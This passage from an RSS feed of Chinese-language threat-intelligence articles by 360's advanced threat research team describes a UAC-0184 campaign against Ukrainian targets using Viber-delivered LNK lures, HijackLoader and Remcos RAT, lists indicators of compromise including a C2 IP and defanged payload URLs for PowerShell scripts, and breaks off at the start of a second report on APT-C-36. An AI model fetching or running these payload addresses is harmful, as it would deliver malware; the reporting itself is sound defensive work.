Zapit_iz_verhovnoi_radi，即“来自最高拉达的质询”）明确指向乌克兰最高立法机构的调查程序。文件内容涉及“军人档案篡改”与“抚恤金拒付申诉”等敏感议题，这与UAC-0184长期以来针对乌克兰政府决策层、军事行政体系及军人个体实施情报窃取的战略动机完全吻合。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2.  攻击利用Viber分发恶意压缩包，延续了该组织利用即时通讯软件扩展攻击面的标志性策略。UAC-0184向来擅长利用Signal、Telegram及约会软件构建信任关系；Viber作为乌克兰极其普及的通讯工具，是其扩展攻击面的典型选择。此外，利用伪装成“军事调查”或“法律请求”文档的LNK文件进行投递，精准复刻了该组织既往行动的惯用手法。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">3. 攻击链最终载荷为Remcos RAT，并由HijackLoader负责释放与加载，这一工具组合是UAC-0184的关键技术特征。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">综上结合受害者定位、社会工程学手段及专用工具集特征，有高置信度将本次攻击活动归因为UAC-0184组织。</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">77da028b852acdcdcf4b46b23e79ac66</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">f7a93c7918a4d8837519eb6619c25b90</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">739dea9edc813c83cc488010cbdc10f6</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1ce195f66d79587d583e4792ceb1c898</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">C2&amp;URL </span></span></strong></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">5.101.85.24</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">http[:]//5.101.85.24/k4s/tune.ps1</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">http[:]//5.101.85.24/k4s/spear.ps1</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">http[:]//5.101.85.24/smoothieks.zip</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]</span><span leaf=""><a href="https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine" target="_blank">https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[2]</span></span><span leaf=""><a href="https://medium.com/@baglai.vlad/hijackloader-ghostpulse-idat-loader-comprehensive-analysis-6e15f48eb96d" target="_blank">https://medium.com/@baglai.vlad/hijackloader-ghostpulse-idat-loader-comprehensive-analysis-6e15f48eb96d</a></span></span></p></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 7 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=87230c98&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507757%26idx%3D1%26sn%3Dcf6b118e88395af45a000aae80811264">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 26 Dec 2025 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-36（盲眼鹰）利用Hijackloader开展攻击活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507733&amp;idx=1&amp;sn=3d730c508c604d313fa8b3a035ba9d44</link>
      <description>360高级威胁研究院监测发现，盲眼鹰组织在2025年10月份实施了新一轮攻击活动，在本次攻击活动中，攻击者使用了Hijackloader加载恶意载荷。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2025-12-19 17:31</span> <span style="display: inline-block;">北京</span></p>




  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a04118bc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4Pr2uPickIRicoiaAn7YodZXrmk2MMFTCic98RxcJ36epnEIgfJ234AHQ3TBPTKQYdKGK0hpQV2librRCfA%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>360高级威胁研究院监测发现，盲眼鹰组织在2025年10月份实施了新一轮攻击活动，在本次攻击活动中，攻击者使用了Hijackloader加载恶意载荷。</p>
  <div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;text-indent: 0px;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-36</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">盲眼鹰</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-36（盲眼鹰）是一个疑似来自南美洲的APT组织，主要目标位于哥伦比亚境内和南美洲的一些国家和地区，如厄瓜多尔、智利和巴拿马等。该组织自2018年被发现以来，针对以上目标地区的政府部门、金融、保险等行业以及大型公司持续发起定向攻击。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">近期360高级威胁研究院监测发现，盲眼鹰组织在2025年10月份实施了新一轮攻击活动，在本次攻击活动中，攻击者使用了Hijackloader[1][2]加载恶意载荷，并呈现出以下技术特点：</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1、灵活使用各类API间接调用方法；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2、该loader以模块化形式运作，并使用各类注入手段多阶段、反复进行shellcode注入。通过以上技术的综合运用，达到欺骗受害者、迷惑分析人员和逃避各类自动化检测手段的目的。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang 